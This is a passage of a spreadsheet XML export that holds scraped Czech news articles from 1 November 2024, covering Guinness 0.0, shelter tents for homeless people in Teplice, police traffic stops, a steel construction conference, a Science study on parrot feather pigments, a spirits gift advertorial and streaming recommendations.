    <t>Guinness nově i v nealko verzi Značka irského piva Guinness reaguje na rostoucí poptávku po nealkoholických pivních alternativách a přivádí na český trh novinku Guinness 0.0, variantu oblíbeného piva s nulovým obsahem alkoholu . Novinka v elegantní černo modro zlaté plechovce chutná jako její čepovaná verze. Guinness 0.0 si získal velkou oblíbenost v zahraničí, například ve Velké Británii , Irsku , USA či Francii . Díky nulovému obsahu alkoholu si značka získává i nové spotřebitele, kteří si oblíbili chuť plného irského stoutu, ale z nějakého důvodu nemohou nebo nechtějí konzumovat alkohol . Poptávka po nealkoholických variantách piv roste – tvoří už přes 4 % celkové konzumace piva v Česku. Pivovary Staropramen , které jsou výhradním distributorem značky Guinness pro Českou republiku , na tento trend reagovaly už na jaře. „V březnu jsme na trh uvedli Staropramen Nealko s vylepšenou recepturou, v květnu rozšířili portfolio nealkoholických pivních mixů o řadu COOL+. Možnost vychutnat si svůj oblíbený nápoj bez obsahu alkoholu chceme nyní dopřát i milovníkům ikonického piva Guinness,“ uvádí Matěj Pumpr, brand manažer značky Guinness ze společnosti Pivovary Staropramen . Díky jedinečnému použití dusíku, jehož průkopníkem je právě společnost Guinness, nabízí plechovkové nealkoholické pivo Guinness 0.0 krémově sametovou texturu, podobnou perfektně načepovanému pivu . Po otevření plechovky se dusík uvolní z malé plastové kuličky, která v nápoji vytvoří příval bublinek. Po nalití do sklenice se bublinky usadí a vytvoří známou bílou hutnou pěnu, která navodí zážitek z piva z restaurace přímo u spotřebitelů doma. Vedle toho Guinness 0.0 vyniká magickými tóny kávy a hořké čokolády, stejně jako dokonalou rovnováhou sladkosti ze sladu, charakteru z praženého ječmene a hořkosti z chmele. Za zmínku stojí elegantní černo modro zlatý vzhled plechovky. Publikováno: 1. 11. 2024 Souhlas s použitím cookies Abychom vám mohli poskytnout co nejlepší služby, používáme soubory cookies. Tento souhlas s použitím cookies nám umožní zpracovávat vaše chování při procházení tohoto webu a zpracovávat jedinečné identifikátory. Nesouhlas nebo odvolání souhlasu může nepříznivě ovlivnit některé vlastnosti nebo služby poskytované na tomto webu. Technické cookies Vždy aktivní Tyto cookies jsou nezbytně nutné pro fungování tohoto webu a jeho služeb. Bez nich by tento web nefungoval správně. Například by nebylo možné dodržovat zásady bezpečnosti na webu. Předvolby Technické uložení nebo přístup je nezbytný pro legitimní účel ukládání preferencí, které nejsou požadovány odběratelem nebo uživatelem. Analytické cookies Technické uložení nebo přístup, který se používá výhradně pro statistické účely. Tyto cookies jsou na našem webu shromažďovány skriptem společnosti Google Inc., která následně tato data anonymizuje. Po anonymizaci se již nejedná o osobní údaje, protože anonymizované cookies nelze přiřadit konkrétnímu uživateli, respektive konkrétní osobě. My pracujeme pouze s cookies v anonymizované podobě. Proto nedokážeme z cookies zjistit chování konkrétního uživatele. Marketingové cookies Tyto cookies používáme pro účely využití služeb Google Maps a Youtube, a dále ke sdílení na sociálních sítích Facebook a Twitter . Autor: adrianaweberova Rubrika transition_slide Novinky / Akce</t>
  </si>
  <si>
    <t>90</t>
  </si>
  <si>
    <t>20241101_263_3244361653_79d3a199c0f5c173444a.html</t>
  </si>
  <si>
    <t>79d3a199c0f5c173444a</t>
  </si>
  <si>
    <t>Až 15 bezdomovců může ode dneška v Teplicích přespat ve vytápěném stanu</t>
  </si>
  <si>
    <t>Až 15 bezdomovců může ode dneška v Teplicích přespat ve vytápěném stanu 1. listopadu 2024 11:46 | foto: ČTK Lidé bez přístřeší v Teplicích se mohou ode dneška přijít vyspat do vytápěných stanů u sídla kontaktního a poradenského centra White Light. Je v nich 15 míst a je už několik zájemců. Bezdomovec Ivan ČTK řekl, že si přeje, aby mu spaní v teple dnes v noci vyšlo. Pro svou nedočkavost přišel už před několika dny, přinesl si i deku a polštář. Stany tou dobou ještě nebyly připravené, také dnes se dodělávají poslední detaily, řekl ČTK vedoucí kontaktního centra a terénních programů Oto Kovanda. White Light provozuje kontaktní centrum, terénní programy a ambulanci pro léčbu závislostí. Do kontaktního centra přijde za rok okolo 400 klientů, terénní program využívá 200 lidí. "My samozřejmě máme nějaké klienty, o kterých víme, kteří sem zřejmě přijdou. Další klienti budou z nízkoprahového centra Květina a naši terénní pracovníci rozdávají letáky po městě," uvedl Kovanda. Ve zkušebním režimu bude přespávání ve stanech fungovat zhruba dva týdny. Vedoucí řekl, že při velkém zájmu budou dostávat přednost ženy, starší lidé a handicapovaní. Až klesnou teploty pod minus pět stupňů Celsia, zřídí White Light i Květina tzv. krizové židle. Lidé bez domova na nich budou moci trávit noc uvnitř, kapacita se tak zýší o dalších 18 míst. Větší stan pojme až 15 lidí. Kdyby některý z klientů chtěl spát odděleně, protože si sebou přivede například psa, bude mu to umožněno v menším stanu. Noc ve stanu mohou trávit osoby bez přístřeší a musejí být schopny dodržovat pravidla. "Podmínkou je, aby se ten člověk choval přijatelně. Nemusí to být tak, že bude úplně čistý. Nikdo nebude dělat žádné testy na drogy a na alkohol," doplnil Kovanda. Lidé mohou přicházet od 19:30 do 22:00, pracovníci je budou budit kolem půl sedmé ráno. "Dáme jim nějakou kávu a čaj, možná nějakou sušenku," řekl vedoucí. Stany budou u sídla centra do března. Ve stanech jsou palety pokryté krabicemi a kobercem. White Light zažádalo na městě o polní lůžka, kterými doplní prostory později. Spacáky, polštáře a deky mohou mít klienti vlastní, centrum má ale také několik erárních. Autor: ČTK Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20241101_264_3243336525_76e7961794557e6a6b67.html</t>
  </si>
  <si>
    <t>76e7961794557e6a6b67</t>
  </si>
  <si>
    <t>Hlídka českobudějovické městské policie zastavila vozidlo s nefunkčním světlem. To odhalilo daleko závažnější prohřešky proti zákonu</t>
  </si>
  <si>
    <t>Hlídka českobudějovické městské policie zastavila vozidlo s nefunkčním světlem. To odhalilo daleko závažnější prohřešky proti zákonu 01.11.2024 Defekt na vozidle jedoucího z benzínky v Novohradské ulici poukázal v pátek nad ránem na zákaz řízení a řidiče pod vlivem návykových látek. Ke své smůle potkal bystrou hlídku městské policie. Čtyřiatřicetiletý muž skončil v rukou policistů. V pátek 1. listopadu krátce po jedné hodině ranní prováděla hlídka městské policie kontrolní činnost v Novohradské ulici . Od benzinové čerpací stanice právě vyjíždělo vozidlo, jemuž nesvítilo jedno ze zadních světel. Strážníci vozidlo vzápětí zastavili. Když však řidiče vyzvali k předložení dokladů potřebných k řízení motorového vozidla, žádných se nedočkali. Čtyřiatřicetiletý muž se strážníkům svěřil, že není držitelem řidičského oprávnění. Částečně to byla pravda, k tomu však zapomněl dodat, že podléhá zákazu řízení všech motorových vozidel, a to až téměř do konce roku 2025. Jak se ukázalo, nebyl to jeho jediný prohřešek proti zákonu. Provedená orientační dechová zkouška na alkohol sice ukázala negativní výsledek, opačně tomu však bylo u testu na omamné a psychotropní látky, který u něj provedla přivolaná hlídka Policie ČR. Policisté si řidiče pro podezření z přečinu maření výkonu úředního rozhodnutí a vykázání a přečinu ohrožení pod vlivem návykové látky převzali k dalšímu šetření. Autor: skolkovav@c-budejovice.cz Autor person skolkovav@c-budejovice.cz</t>
  </si>
  <si>
    <t>187</t>
  </si>
  <si>
    <t>20241101_265_3243335464_f59e6fd59070b7081526.html</t>
  </si>
  <si>
    <t>f59e6fd59070b7081526</t>
  </si>
  <si>
    <t>Na konferenci KONSTRUKCE 2024 budou přední odborníci diskutovat o budoucnosti oboru</t>
  </si>
  <si>
    <t>Na konferenci KONSTRUKCE 2024 budou přední odborníci diskutovat o budoucnosti oboru Nabídka práce - doprava a stavba Kalendář akcí Aktuální číslo Archiv vydání Předplatné Inzerce Hledat na stránkách silnice-zeleznice.cz Vzdělávání Na konferenci KONSTRUKCE 2024 budou přední odborníci diskutovat o budoucnosti oboru Na konferenci KONSTRUKCE 2024 budou přední odborníci diskutovat o budoucnosti oboru autor: (red) Konference KONSTRUKCE 2024 umožní odborníkům na ocelové konstrukce se potkat a prodiskutovat nové technologie a přístupy, jež mohou posunout celý obor kupředu. Konference KONSTRUKCE 2024, která se uskuteční 14. listopadu v Harmony Hotelu ve Špindlerově Mlýně , umožní odborníkům na ocelové konstrukce se potkat a prodiskutovat nové technologie a přístupy, jež mohou posunout celý obor kupředu. Jedním z témat bude využití umělé inteligence při návrhu ocelových přípojů – zrychlí a zpřesní projektování? Program konference je rozdělen do dvou odborných bloků. První okruh se bude věnovat ocelovým konstrukcím v pozemním stavitelství. Nové informace z technické komise České asociace ocelových konstrukcí představí Dalibor Gregor . O poznatky z prohlídek nosných konstrukcí se podělí Jan Mařík z KONSTAT. S analýzou evropského ocelářství vystoupí Jiří Dufek z Ocelářské unie a nový přístup k návrhu ocelových přípojů s podporou umělé inteligence vysvětlí Šimon Racek ze společnosti Allplan Česko. Nebude samozřejmě chybět ani tématika realizací, jako je například nosná ocelová konstrukce Průmyslového paláce v Praze nebo požadavky na bezpečnost práce při montáži ocelových konstrukcí a technologií v Německu . Druhý blok bude věnován ocelovým mostům na železnici, silnici nebo dálnici. K této problematice vystoupí Jiří Hlavatý , Ředitelství silnic a dálnic ČR a Jiří Krouský ze Správy železnic. Účastníci budou také seznámeni s protikorozní ochranou ocelových konstrukcí železničních mostů nebo nejnovějšími realizacemi – lávkou pro pěší v železniční stanici Pardubice hlavní nádraží. „To je však jen zlomek, inspirativních přednášek je mnohem více. Vždy nabízíme velmi pestrý program, abychom vytvořili platformu pro všechny, kteří se chtějí vzdělávat, sdílet zkušenosti a sledovat aktuální trendy v oblasti ocelových konstrukcí“, doplňuje Monika Odstrčilová z vydavatelství KONSTRUKCE Media, které akci ve spolupráci s Českou asociací ocelových konstrukcí pořádá. Konference je navíc zařazena do systému celoživotního vzdělávání členů ČKAIT a ohodnocena jedním bodem. Vedle přednášek konference nabídne prostor pro networking mezi špičkami z oboru. Součástí akce bude také večerní společenský program s rautem a ochutnávkou vína , kde se předá ocenění „Vynikající diplomová práce v oboru ocelových konstrukcí“. Druhý den konference, 15. listopadu, je tradičně věnován Generálnímu shromáždění České asociace ocelových konstrukcí, které je určené jen pro její členy. Registrace je stále možná! Více se dozvíte ZDE. Termín: 14. listopadu 2024 Místo: Harmony Hotel Špindlerův Mlýn Poslat odkaz emailem Autor: (red)</t>
  </si>
  <si>
    <t>645</t>
  </si>
  <si>
    <t>608</t>
  </si>
  <si>
    <t>20241101_266_3243314785_b499916f87bc3905d85c.html</t>
  </si>
  <si>
    <t>b499916f87bc3905d85c</t>
  </si>
  <si>
    <t>Nová studie v časopise Science odhaluje tajemství barev papoušků</t>
  </si>
  <si>
    <t>Nová studie v časopise Science odhaluje tajemství barev papoušků Od karnevalu v Riu de Janeiru až po miláčky pirátů: papoušci jsou pro lidi na celém světě synonymem barevnosti. Mezinárodní konsorcium vedené vědci z portugalského BIOPOLIS-CIBIO právě publikovalo studii v jednom z nejprestižnějších vědeckých časopisů Science, ve které odhalilo, jak krásné zbarvení papouščího peří vzniká. Na studii se kromě portugalských a amerických akademiků významně podíleli také tři čeští vědci. Doktor Jindřich Brejcha z katedry filosofie a dějin přírodních věd Přírodovědecké fakulty Univerzity Karlovy, který je jedním ze tří hlavních autorů studie, a dále docent Peter Mojzeš z Matematicko-fyzikální fakulty Univerzity Karlovy a doktor Petr Maršík z České zemědělské univerzity. Modelovým druhem pro studii byl papoušek lori tmavý (Pseudeos fuscata). Ten je výjimečný tím, že se v lesích Nové Guiney přirozeně vyskytuje ve dvou barevných variantách, žluté a červeno-oranžové. Vnitrodruhový polymorfismus ve zbarvení je u papoušků překvapivě vzácný. Foto: Pedro Miguel Araujo Papoušci by opravdu mohli být synonymem pro barevnost, jelikož téměř všechny druhy jsou výrazně zbarvené, a to zejména červeně nebo žlutě. Zelená barva je vlastně také žlutá, ale na modrém pozadí. Už na konci 19. století bylo jasné, že barviva v peří papoušků jsou odlišná od všech ostatních červených a žlutých pigmentů vyskytujících se v peří ptáků či srsti jiných zvířat. Dostala proto svá vlastní pojmenování. Červenému pigmentu se říkalo „Araroth“ (podle papouška Ary a slova roth které má více vysvětlení původu, např. prolévání krve, zbarvení červené hlíny) a žlutý pigment měl označení „Psittakofulvin“ (z řeckého psittakós a latinského fulvus, tedy papoušek a žlutá). Označení psittakofulviny se nakonec vžilo pro všechny papouščí pigmenty a teprve na začátku 21. století byla odhalena jejich detailní chemická struktura. Avšak až do dnešního dne se pouze spekulovalo o tom, jak přesně žlutá a červená barva papoušků vlastně vzniká. Je snad rozdíl v uspořádání pigmentů v peří, nebo ve velikosti molekul psittakofulvinů? Nyní se ukázalo, oproti původní představě psittakofulvinů jako jedné látky, že opravdu existují dvě chemické formy těchto barviv. Jedna z nich, tzv. aldehyd, byla známa právě již od roku 2001. Druhou formu vědecký tým potvrdil ve své nové studii. Navíc nová studie odhaluje detailní molekulární mechanismus, díky kterému dochází k přeměně aldehydového psittakofulvinu na karboxylovou kyselinu. Oproti předchozím výzkumům tak nyní už víme, že papouščí pigmenty vznikají nejen spojováním krátkých dvou až tří uhlíkových molekul proteinem polyketid syntetáza, ale i to, že primárním výsledkem syntézy není karboxylová kyselina, ale právě aldehyd, který je na karboxylovou kyselinu řízeně upravován „To byla jedna z nesrovnalostí, která nás vedla k tomu, že musí existovat opravdu dvě formy psittakofulvinů. Předchozí molekulární studie totiž nedokázala vysvětlit, co je výsledkem syntézy, protože by to musela být jiná forma psittakofulvinu, než kterou všechny ostatní studie nacházely v peří papoušků. Zřejmě to bylo tím, že jedni si vybrali žlutého papouška, zatímco všichni před nimi studovali papouška červeného,“ vysvětluje Jindřich Brejcha . Modelovým druhem pro studii byl indonéský druh papouška lori, který se v přírodě vyskytuje ve dvou morfách – žlutě a červeně zbarvené, lori tmavý (Pseudeos fuscata). „Naši kolegové si vybírají pro své molekulární studie modely, o kterých se ví, že jejich genom bude stejný a jediný rozdíl bude právě zodpovědný za konkrétní fenotypový znak. Pro takové studie jsou polymorfní druhy vynikající, ale u papoušků je vnitrodruhový polymorfismus bohužel vzácný,“ vysvětluje volbu modelového druhu Jindřich Brejcha . Portugalský tým začal sekvenovat genom obou barevných variant tohoto papouška a hledat, které úseky DNA by mohly být zodpovědné za rozdíly ve zbarvení. Výsledkem bylo vytipování oblasti zodpovědné za regulaci aktivity naprosto běžného proteinu, aldehyd dehydrogenázy ALDH3A2. Aldehyd dehydrogenázy jsou rodina velice běžných proteinů, které nalézáme napříč všemi organismy. U člověka jsou například naprosto zásadní při přeměně alkoholů přes jedovaté aldehydy na neškodné karboxylové kyseliny. Dysfunkce ALDH3A2 je u člověka také zodpovědná za dědičnou kožní chorobu provázenou neurologickými symptomy, tzv. Sjögren-Larssonův syndrom. První měření papouščího peří pomocí Ramanovy mikroskopie na Matematicko- fyzikální fakultě UK ukázalo, že červená a žlutá barva peří se zřejmě opravdu liší délkou řetězců. „Poloha nejintenzivnějších pásů v Ramanových spektrech dobře korelovala s barvou peří i očekávanou délkou řetězců, ale na druhou stranu, jejich extrémní intenzita znemožňovala detekci slabších vibračních pásů, které by nám řekly více o jiných funkčních skupinách,“ shrnuje tuto část experimentů docent Peter Mojzeš. Pomocí chromatografie a hmotnostní spektrometrie ale Petr Maršík s Jindřichem Brejchou našli nečekaně velkou diverzitu látek, kterou nepředpokládali. „Díky znalosti genu nás napadlo, že se musíme se podívat i na koncové funkční skupiny molekul psittakofulvinů, a proto jsme udělali srovnání mezi červeným a žlutým peřím mnoha druhů papoušků. Pomocí separace kapalinovou chromatografií spojenou s kombinací metod hmotnostní spektrometrie s ultravysokým rozlišením a UV-Vis absorpční spektroskopie se nám podařilo prokázat přítomnost dvou funkčních skupin – aldehydické a karboxylové – a zároveň potvrdit vztah mezi funkční skupinou psittakofulvinu a barvou peří. Za peří z mnohdy velmi vzácných druhů vděčíme chovatelům, plzeňské Zoo nebo záchranné stanici pro opuštěné papoušky Laguna,“ popisuje další postup doktor Petr Maršík z ČZU . Povedlo se tak získat vzorky například od chráněného novozélandského papouška nestor kea či peří podivného druhu papouška, trichy orlí. Výsledky ukázaly, že pro výsledné zbarvení peří napříč všemi liniemi papoušků je zásadní rozdíl v poměru aldehydů a karboxylových kyselin. Analýza exprese genů ukázala, že v červeném peří se aldehyddehydrogenáza vytváří méně a aldehyd, který enzym přeměňuje, se v něm proto kumuluje. Naopak, ve žlutém a zeleném peří se aldehyd efektivně odbourává, protože aldehydázy je zde dostatek. Výsledkem je vyšší podíl karboxylové kyseliny v žlutém peří. Další molekulární analýzy například odhalily, že ve chvíli, kdy se peří formuje a zřejmě dochází k syntéze psittakofulvinů, je DNA v oblasti genu ADLH3A2 rozpojená, co značí, že se gen přepisuje. V neposlední řadě se pomocí sekvenování na úrovni jednotlivých buněk v tkáni podařilo ukázat, že ADLH3A2 se přepisuje přímo v buňkách, které budou tvořit peří. Toto zjištění je jeden z prvních přímých důkazů o tom, jak se pigment do peří dostává. „Ve chvíli, kdy jsme měli jednotlivé výsledky, zbývalo už jen nějakým jednoznačným způsobem ověřit, že náš protein opravdu dělá to, co si myslíme,“ vysvětluje další kroky studie Jindřich Brejcha . Na experimentu s buněčnými kulturami pivních kvasinek pracovali naši vědci společně s vědeckým týmem z USA . „Kolegové kvasinky upravili tak, že produkovaly psittakofulviny. Jenže kvasinky mají vlastní aldehydázy, a tak jsme nejdříve produkci aldehydu nepozorovali. Pokud se ale všechny aldehydázy kvasinek zablokovaly, aldehydy se objevily. Jakmile se kvasinkám zabudovala do genomu papouščí ALDH3A2, začala v nich pracovat a aldehydy štěpit na karboxylové kyseliny. Při měření jsme navíc objevili další meziprodukty syntetické dráhy, což doplnilo naši představu o celkové syntéze psittakofulvinů,“ popisuje konečný důkaz Jindřich Brejcha . Podle autorů ale nejsou ještě všechna tajemství papouščího zbarvení odhalena a jejich výzkum otevírá další otázky. Jedním z nevysvětlených tajemství tak zůstává, proč vlastně papoušci vytvářejí své barvy úplně jinak než všechny ostatní organismy. Mgr. Jindřich Brejcha , Ph.D., a kol. Zjednodušené znázornění hlavních bodů studie: Analýza chemického složení peří dohromady s molekulární analýzou genomu papoušků a genové exprese (bulk i single-cell) jasně ukázaly důležitou roli regulace funkce aldehyd dehydrogenázy ALDH3A2 na tvorbě žluté a červené barvy. Nové je i to, že psittakofulviny se vyskytují v barevném peří ve dvou formách. V minulosti se myslelo, že existují pouze ve formě jedné. Pro červené peří je charakteristická aldehydová forma, pro žluté peří carboxy-forma. Chemické a molekulární výsledky byly potvrzeny in vitro experimentem za použití genetické manipulace kvasinek, kterým se podařilo replikovat syntézu a úpravu psittakofulvinů. Autorka ilustrace: Kristýna Eliášová Detail červeného peří papouška ara arakanga (Ara macao). Foto: Jindřich Brejcha Detail kontrastního červeno-černého peří zvláštního papouška trichy orlí (Psittrichas fulgidus). Foto: Jindřich Brejcha Detail červeno-žlutého peří papouška kea (Nestor notabilis). Foto: Jindřich Brejcha Detail zeleného peří andulky vlnkované (Melopsittacus undulatus). Zelená barva větví peří vzniká souhrou žlutých psittacofulvinů na modrém podkladu, který vzniká díky nano-bublinkám ve struktuře peří. Foto: Jindřich Brejcha Hlava jihoamerického papouška pyrury zelenolící (Pyrrhura molinae). Foto: Petr Šípek Hlava jihoamerického papouška amazoňana pomoučeného (Amazona farinosa), největšího druhu amazoňanů. Foto: Petr Šípek Ara arakanga hraje všemi barvami. Foto: Petr Juračka Papoušek nestor kea (Nestor notabilis) je jedním ze tří v současnosti žijících druhů čeledi kakapovití, která je nejdříve se odvětvující linií papoušků. Nestoři kea mají v klidu zeleno- hnědou barvu, ovšem pokud roztáhnou křídla, promění se v pestrobarevné skvosty. Foto: Tomáš Grim Detail žlutého peří papouška ara arakanga (Ara macao). I v rámci jednoho pírka se může barva proměňovat z červené na žlutou. Foto: Jindřich Brejcha Podobné články Autor: Lenka Prokopová Autor person Lenka Prokopová Rubrika transition_slide Aktuálně</t>
  </si>
  <si>
    <t>242</t>
  </si>
  <si>
    <t>20241101_267_3243357942_9f4785734f151c3c7c68.html</t>
  </si>
  <si>
    <t>9f4785734f151c3c7c68</t>
  </si>
  <si>
    <t>Hledáte ideální dárek na Vánoce? Vsaďte na tekutou jistotu</t>
  </si>
  <si>
    <t>Hledáte ideální dárek na Vánoce? Vsaďte na tekutou jistotu 1. 11. 2024 25 Vánoce se blíží a s nimi i otázka, jaký dárek vybrat pro své blízké. Pokud hledáte něco skutečně výjimečného, máme pro vás řešení. Luxusní lihoviny a šampaňská vína jsou nejen symbolem elegance, ale také nezapomenutelným zážitkem pro obdarované. Přinášíme vám tipy na ty nejvybranější produkty, které váš vánoční dárek povýší na umělecké dílo. Každý rok se snažíme nalézt ten správný dárek, který by nejen potěšil, ale i vyjádřil, jak moc nám na druhých záleží. Když se zamyslíme nad tím, co by mohlo být univerzálně oblíbené, kvalitní a zároveň reprezentativní, odpověď je jasná: vysoce kvalitní alkoholické nápoje. Tyto produkty nejsou jen o chuti, ale také o příběhu, tradici a umění, které stojí za jejich výrobou. Následující výběr vám pomůže najít ten perfektní dárek, který naplní vánoční chvíle radostí a luxusem. Flor de Caña Centenario 12 Year Rum v dárkovém balení Tento rum je synonymem pro sofistikovanost a tradici. S bohatou chutí, ve které se snoubí tóny vanilky, karamelu a exotického ovoce, je ideálním dárkem pro milovníky jemného a hladkého rumu. Dárkové balení navíc podtrhuje jeho exkluzivitu. K dostání je za 885 Kč. Flor de Caña Centenario 18 Year Rum Pro ty, kteří hledají něco opravdu výjimečného, je tu osmnáctiletá verze Flor de Caña. Tento rum překvapí svou hloubkou a komplexností, přinášející chuťové vjemy tmavé čokolády, karamelizovaného ovoce a jemného koření. Seženete v dárkové krabičce za 1 225 Kč. Meukow Cognac VSOP v dárkovém balení Značka Meukow je známá svou kvalitou a VSOP varianta nabízí vyváženou kombinaci ovocných a kořeněných tónů. Elegantní dárkové balení z něj činí ideální dárek pro každého, kdo ocení jemný a distingovaný koňak. Můžete koupit za 1 195 Kč. Bohemian gin v dárkovém balení Tento gin je skutečnou poctou českému řemeslu. S jedinečnou kombinací bylin a koření přináší osvěžující zážitek, který potěší každého znalce ginu. Dárkové balení navíc dodává tomuto nápoji nádech tradiční elegance. Pořídíte za 1 260 Kč. Piper Heidsieck Cuvée Brut v dárkovém balení Toto šampaňské je perfektní volbou pro slavnostní okamžiky. Jeho jemné perlení a vyvážená chuť s květinovými a ovocnými tóny učiní každou příležitost nezapomenutelnou. Potěší každého milovníka kvalitních bublinek. Můžete sehnat za 1 340 Kč. Champagne Cuvée Brut Perfume Edition Tato edice šampaňského kombinuje luxus a styl v jedinečném balení připomínajícím flakon parfému. Je to přesně ten elegantní a sofistikovaný dárek, který oslní a potěší každého milovníka bublinkových vín. Můžete pořídit za 2 030 Kč. Ať už si z nabídky vyberete cokoliv, uděláte svou volbou pro své blízké z letošních Vánoc skutečně nezapomenutelný zážitek. S těmito produkty nemůžete šlápnout vedle. Autor: Propagace Rubrika transition_slide Články týdne</t>
  </si>
  <si>
    <t>245</t>
  </si>
  <si>
    <t>20241101_268_3243307968_8ccd38ab5399be230fac.html</t>
  </si>
  <si>
    <t>8ccd38ab5399be230fac</t>
  </si>
  <si>
    <t>Večer šampionů s&amp;nbsp;legendou – Marek Jankulovski a jeho host Tomáš Ujfaluši</t>
  </si>
  <si>
    <t>Večer šampionů s&amp;nbsp;legendou – Marek Jankulovski a jeho host Tomáš Ujfaluši 0 46 Užijte si jedinečný večer plný fotbalové atmosféry, kde se spojí příběhy z hřiště, exkluzivní vína a špičkové utkání Ligy mistrů. Prosper Golf Resort Čeladná vás 5. listopadu 2024 zve na výjimečnou událost – Večer šampionů s vítězem Ligy mistrů Markem Jankulovskim a jeho hostem, bývalým reprezentantem Tomášem Ujfalušim . Živý přenos zápasu Real Madrid – AC Milán V programu je sledování utkání Ligy mistrů mezi Realem Madrid a AC Milán , což umožní fanouškům sdílet napětí a radost z každé akce na hřišti. Aby byl zážitek kompletní, připraven je i bohatý raut, který zajistí kulinářské potěšení pro všechny hosty. Příběhy z fotbalového zákulisí a výjimečná vína Součástí programu je talkshow s oběma fotbalovými hvězdami, během které vám poodhalí zákulisí své kariéry, životní příběhy a nezapomenutelné momenty z nejslavnějších zápasů. Během večera budete mít příležitost ochutnat vína z exkluzivní kolekce „THE WINE OF THE CHAMPIONS“. Kdy a kde 📅 Datum: 5. listopadu 2024 od 19:00 📍 Místo: Prosper Golf Resort Čeladná – Event Hall Vstupné a rezervace Cena vstupenky je 1 250 Kč včetně DPH, zahrnuje veškerý program večera: talkshow, degustaci vína , sledování utkání, autogramiádu, soutěže a raut. Vstupenky jsou k dispozici pouze v předprodeji na www.prosper-shop.cz – prodej na místě nebude možný a kapacita je omezená. Speciální nabídka pro firmy Firmy mohou využít možnosti hromadného nákupu vstupenek, ideální jako netradiční večerní program pro zaměstnance nebo obchodní partnery, s nezapomenutelným zážitkem v atmosféře sportovních legend. Zdroj: redakce Úvodní foto: Prosper Golf Resort Čeladná Autor: Monika Ševčíková Autor person Monika Ševčíková Rubrika transition_slide Lifestyle</t>
  </si>
  <si>
    <t>1140</t>
  </si>
  <si>
    <t>20241101_269_3243370363_6dc4f6857bd93410e436.html</t>
  </si>
  <si>
    <t>6dc4f6857bd93410e436</t>
  </si>
  <si>
    <t>Netflix a další na víkend: seriály Ďáblova hodina, Rematch a Diplomatické vztahy. Nebo horory Nehýbej se a Čas říznout</t>
  </si>
  <si>
    <t>Netflix a další na víkend: seriály Ďáblova hodina, Rematch a Diplomatické vztahy. Nebo horory Nehýbej se a Čas říznout Ukázat všechny listy najednou Diplomatické vztahy V době mezinárodní krize se diplomatka snaží zvládat novou práci na pozici ostře sledované velvyslankyně ve Velké Británii i divoké manželství se slavným politikem. Keri Russell září již ve dvou řadách hutného politického dramatu. Originální název: The Diplomat Drama seriály (2023) 14 epizod (nové od 31. 10. 2024 ) CZ titulky • CZ dabing Netflix Pokračování 2 / 6 Nehýbej se Truchlící žena potká v lese vraha, který jí vpíchne paralyzující injekci. Podaří se jí uniknout, než látka zabere a zcela ji ochromí? Nový globální hit Netflixu produkoval režisér Sam Raimi . Originální název: Don't Move Horory (2024) CZ titulky • CZ dabing Netflix Pokračování 3 / 6 Tady Zodiac Dokumentární seriál o skutečném zločinu, kde se jedna rodina podělí o výsledky svého pátrání a podá převratné svědectví o hlavním podezřelém v případu vraha Zodiaca. Originální název: This Is the Zodiac Speaking Dokumentární seriály (2024) 3 epizod (nové od 23. 10. 2024 ) CZ titulky • CZ dabing Netflix Pokračování 4 / 6 Rematch Strhující psychologický thriller ze světa šachových soutěží na vysoké úrovni prostřednictvím jednoho z největších zápasů mezi člověkem a strojem. Šachová partie mezi Garrym Kasparovem a superpočítačem Deep Blue, byla tak významná, že přiměla deník New York Times k otištění článku s titulkem: V sázce je budoucnost lidstva. Thriller seriály (2024) 6 epizod (nové od 17. 10. 2024 ) CZ titulky • CZ dabing Max Pokračování 5 / 6 Ďáblova hodina Lucy se probouzí každou noc přesně ve 3.33. V jejím životě už dlouho nic nedává smysl, ale odpovědi leží někde na konci série brutálních vražd. Výtečný thriller s Peterem Capaldim přichází s již druhou řadou. Originální název: The Devil's Hour Thriller seriály (2022) 11 epizod (nové od 18. 10. 2024 ) CZ titulky Amazon Pokračování 6 / 6 Další zajímavé tituly na streamovacích službách Čas říznout (Time Cut) – V roce 2024 se mladá holka náhodou přesune do roku 2003 a dostane tak šanci zabránit vraždě svojí sestry. Podaří se jí ale změnit minulost a nezničit přitom budoucnost? (53%) • Netflix Do toho, brácho (Go Ahead, Brother) – Ze speciální jednotky dostal vyhazov a teď si jenom těžce zvyká na novou práci u ostrahy. Tam ho ale napadne, jak by mohl vyřešit svoje finanční trable. (77%) • Netflix Udělali byste to taky (Tú también lo harías) – Tři útočníci unesou autobus, avšak nestihnou utéct a jsou zavražděni. Výpovědi všech cestujících se shodují: zachránil je muž s kapucí. Čím déle však probíhá vyšetřování, tím více se stírá hranice mezi hrdinou a zločincem. (68%) • Apple TV+ Těžký rok (A Difficult Year) – Dva břídilové Albert a Bruno mají za sebou těžký rok. Jsou zadlužení až po uši, nemají kde bydlet a jejich partnerky je opustily. Kvůli chipsům a pivu zdarma se proto klidně přidají ke skupině mladých aktivistů v čele s okouzlující dívkou přezdívanou Kaktus. Zde najdou čerství přátelé příležitost k nekalým kšeftíkům a později také lásku a energii k novým začátkům. (58%) • Max Hudba Johna Williamse (Music by John Williams ) – Od jeho začátků jako jazzového pianisty až k jeho 54 nominacím na Oscara a pěti ziskům zlatých sošek. Tento dokument oslavuje neuvěřitelný přínos legendárního Johna Williamse pro film a popkulturu obecně. (80%) • Disney+ Autor: Petr Semecký Autor person Petr Semecký</t>
  </si>
  <si>
    <t>3210</t>
  </si>
  <si>
    <t>4570</t>
  </si>
  <si>
    <t>20241101_27_3264633601_4456e92cf501d447d509.html</t>
  </si>
  <si>
    <t>4456e92cf501d447d509</t>
  </si>
  <si>
    <t>Shrnutí Policie při kontrole nehodového úseku na Českolipsku zabavila 3 řidičské průkazy Na dopravně rizikový úsek silnice I/38 u Doks na Českolipsku se ve čtvrtek zaměřili policisté. V minulosti se na ní stalo několik vážných nehod, poslední letos v červenci si vyžádala dvě oběti. Policisté při čtvrteční preventivní akci zadrželi tři řidičské průkazy. Dvěma řidičům kvůli tomu, že v úseku s povolenou 90kilometrovou rychlostí jeli skoro 150 kilometrů za hodinu, a třetímu rychle jedoucímu řidiči i kvůli opilosti. Na webu policie o tom dnes informovala její regionální mluvčí Ivana Baláková. Dopravní policisté se zaměřili na úsek mezi obcemi Obora a Bezděz , kde v červenci po čelním střetu dvou vozidel zemřeli oba řidiči a další čtyři lidé, z toho tři děti, utrpěli vážná zranění. Podle svědků jel tehdy po I/38 z Mladé Boleslavi na Českolipsko velmi riskantně řidič vozu Volkswagen Passat, když u Obory vyjel do protisměru a smetl ze silnice dodávku. "Včerejší (čtvrteční) 